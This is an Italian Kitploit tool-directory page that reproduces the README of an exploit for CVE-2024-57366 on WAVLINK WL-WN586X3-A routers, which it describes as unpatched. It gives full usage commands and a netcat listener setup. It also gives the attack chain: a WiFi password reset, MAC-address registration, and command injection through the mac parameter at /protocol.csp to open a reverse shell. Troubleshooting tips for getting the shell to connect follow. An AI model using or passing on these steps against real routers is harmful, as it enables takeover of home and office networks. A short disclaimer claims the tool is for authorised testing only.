Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-57366 — Exploit sviluppato per CVE-2024-57366 su router WAVLINK WL-WN586X3-A (NON PATCHATO ALLA DATA DI QUESTA VERSIONE!) | Kitploit
Strumenti/GitHubGitHub/h4ckusaur/cve-2024-57366
Sicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WirelessPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

Exploit sviluppato per CVE-2024-57366 su router WAVLINK WL-WN586X3-A (NON PATCHATO ALLA DATA DI QUESTA VERSIONE!)

11 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Exploit CVE-2024-57366

Un exploit robusto per CVE-2024-57366 che consente l'esecuzione remota di codice su router vulnerabili attraverso il bypass della convalida dell'indirizzo MAC e l'iniezione di comandi.

Questo è un exploit post-autenticazione che richiede che la funzione "Controllo remoto" del router sia attiva e la password amministrativa. Il nome utente amministrativo è hardcodato come "admin".

🚀 Funzionalità

  • Registrazione automatica dell'indirizzo MAC - Si connette al WiFi per registrare l'indirizzo MAC con il router
  • Exploit che preserva la rete - Mantiene le connessioni di rete esistenti durante l'exploit
  • Cache degli indirizzi MAC - Exploit rapidi ripetuti utilizzando indirizzi MAC memorizzati nella cache
  • Compatibile con BurpSuite - Corrisponde esattamente al formato della richiesta per la massima affidabilità
  • Gestione dei timeout - Messaggi utili quando sono previste connessioni di reverse shell
  • Facile da usare - Cache degli indirizzi MAC in formato testo semplice per una gestione semplice

📋 Requisiti

  • Python 3.6+
  • Sistema Linux con adattatore wireless
  • Accesso sudo (richiesto per la gestione dell'interfaccia di rete)
  • Router target vulnerabile a CVE-2024-57366

🛠️ Installazione

  1. Clona o scarica i file dell'exploit
  2. Assicurati di avere i pacchetti Python richiesti:
    root@kitploit:~
    pip3 install requests
    

🎯 Utilizzo

Exploit Base (Prima Volta)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

Exploit Rapido (Utilizzando MAC in Cache)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Lo script chiederà: "Use cached MAC for quick exploit? (y/n):" - rispondi "y"

Forza Exploit Completo (Salta la Cache)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

Elenca gli Indirizzi MAC in Cache

root@kitploit:~
python3 exploit.py --list-cached

📖 Opzioni della Riga di Comando

  • --target - Indirizzo IP del router target (default: 127.0.0.1)
  • --port - Porta del router target (default: 80)
  • --local-ip - Il tuo indirizzo IP locale per il callback della reverse shell
  • --local-port - Porta locale per il callback della reverse shell (default: 4444)
  • --password - Password amministrativa del router
  • --ssid - Nome della rete WiFi (default: WAVLINK-Mesh_DC4B)
  • --force-full - Forza l'exploit completo, salta il controllo del MAC in cache
  • --list-cached - Elenca gli indirizzi MAC in cache ed esci

🔧 Come Funziona

Panoramica Tecnica

CVE-2024-57366 sfrutta un bypass della convalida dell'indirizzo MAC nel firmware del router. La vulnerabilità consente l'iniezione di comandi attraverso il parametro mac nell'endpoint /protocol.csp.

Processo dell'Exploit

  1. Autenticazione - Estrae il token di autenticazione dal router
  2. Reset della Password WiFi - Resetta la password WiFi del router in modo che corrisponda alla password amministrativa
  3. Registrazione MAC - Si connette al WiFi per registrare l'indirizzo MAC con il router
  4. Iniezione di Comandi - Inietta il payload della reverse shell utilizzando il MAC registrato
  5. Preservazione della Rete - Mantiene le connessioni di rete esistenti durante tutto il processo

Dettagli Tecnici Chiave

  • Bypass della Convalida MAC: Il router convalida gli indirizzi MAC verificando se si sono connessi al WiFi
  • Binding dell'Interfaccia di Rete: Utilizza l'interfaccia eth0 per preservare il contesto di rete originale
  • Formato della Richiesta: Corrisponde esattamente al formato di BurpSuite (index=1, token nel percorso URL)
  • Payload: Reverse shell Netcat con named pipe per affidabilità

Cache degli Indirizzi MAC

L'exploit memorizza automaticamente nella cache gli indirizzi MAC riusciti in successful_macs.txt:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

Aggiunta Manuale di MAC: Modifica successful_macs.txt e aggiungi righe come:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 Esempio di Utilizzo

Primo Tentativo di Exploit

root@kitploit:~
# Avvia il listener netcat
nc -lvp 4444

# Esegui l'exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# Quando viene chiesto di salvare l'indirizzo MAC, rispondi "y"

Exploit Successivi (Molto Più Veloci)

root@kitploit:~
# Avvia il listener netcat
nc -lvp 4444

# Esegui l'exploit (utilizzerà il MAC in cache)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Rispondi "y" quando viene chiesto se utilizzare il MAC in cache

🔍 Risoluzione dei Problemi

Problemi Comuni

  1. "No wireless adapters found"

    • Assicurati di avere un adattatore wireless abilitato
    • Verifica che il WiFi sia acceso
    • Prova a eseguire con sudo
  2. "MAC address validation failed"

    • L'indirizzo MAC deve essere registrato con il router
    • Assicurati che il passo di connessione WiFi sia stato completato con successo
    • Prova a connetterti prima manualmente al WiFi
  3. "Request timed out"

    • Potrebbe effettivamente significare che l'exploit ha funzionato!
    • Controlla il tuo listener netcat per una connessione di reverse shell
    • Il router potrebbe eseguire il comando ma non rispondere all'HTTP
  4. "Reverse shell not connecting"

    • Verifica che il tuo --local-ip sia corretto (usa ip addr show eth0)
    • Assicurati che nessun firewall stia bloccando la connessione
    • Controlla che il listener netcat sia in esecuzione sulla porta corretta

Requisiti di Rete

  • Interfaccia eth0: Deve avere un indirizzo IP per la preservazione della rete
  • Adattatore wireless: Richiesto per la registrazione MAC iniziale
  • Accesso al router: Deve essere in grado di raggiungere il router tramite l'interfaccia eth0

📁 Struttura dei File

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Script principale dell'exploit
├── successful_macs.txt     # Cache degli indirizzi MAC (generato automaticamente)
└── README.md              # Questo file

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di test autorizzati. Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicito permesso di testare. Gli autori non sono responsabili per qualsiasi uso improprio di questo strumento.

🔗 Riferimenti

  • CVE-2024-57366
  • Vulnerabilità del firmware del router nella convalida dell'indirizzo MAC
  • Iniezione di comandi attraverso l'endpoint /protocol.csp

📝 Licenza

Questo progetto è fornito così com'è per scopi educativi. Utilizzalo in modo responsabile e in conformità con le leggi e i regolamenti applicabili.

Scarica lo strumento